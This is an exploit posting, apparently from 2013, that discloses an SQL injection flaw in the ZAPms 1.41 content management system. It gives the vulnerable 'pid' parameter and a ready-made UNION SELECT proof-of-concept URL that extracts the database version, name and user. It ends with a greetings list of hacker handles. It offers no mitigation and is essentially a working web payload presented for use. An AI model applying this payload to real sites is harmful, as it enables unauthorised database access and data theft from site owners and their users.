45 lines
No EOL
1.6 KiB
Text
45 lines
No EOL
1.6 KiB
Text
=============================================================================================================
|
|
|
|
|
|
[o] ZAPms <= SQL Injection Vulnerability
|
|
|
|
Software : ZAPms
|
|
Version : 1.41
|
|
Vendor : http://www.zapms.de
|
|
Author : NoGe
|
|
Contact : noge[dot]code[at]gmail[dot]com
|
|
Desc : ZAPms is free open source web content management system,
|
|
adapted to the needs of businesses on the Internet.
|
|
The ZAPms offers many features and modules as well as an expansion interface for maximum capabilities.
|
|
|
|
|
|
=============================================================================================================
|
|
|
|
|
|
[o] Exploit
|
|
|
|
http://localhost/[path]/products?pid=[SQLi]
|
|
|
|
|
|
=============================================================================================================
|
|
|
|
|
|
[o] PoC
|
|
|
|
http://server/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
|
|
|
|
|
|
=============================================================================================================
|
|
|
|
|
|
[o] Greetz
|
|
|
|
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
|
|
aJe kaka11 matthews wishnusakti inc0mp13te martfella
|
|
pizzyroot Genex H312Y noname tukulesto }^-^{
|
|
|
|
|
|
=============================================================================================================
|
|
|
|
|
|
[o] April 09 2013 - Papua, Indonesia |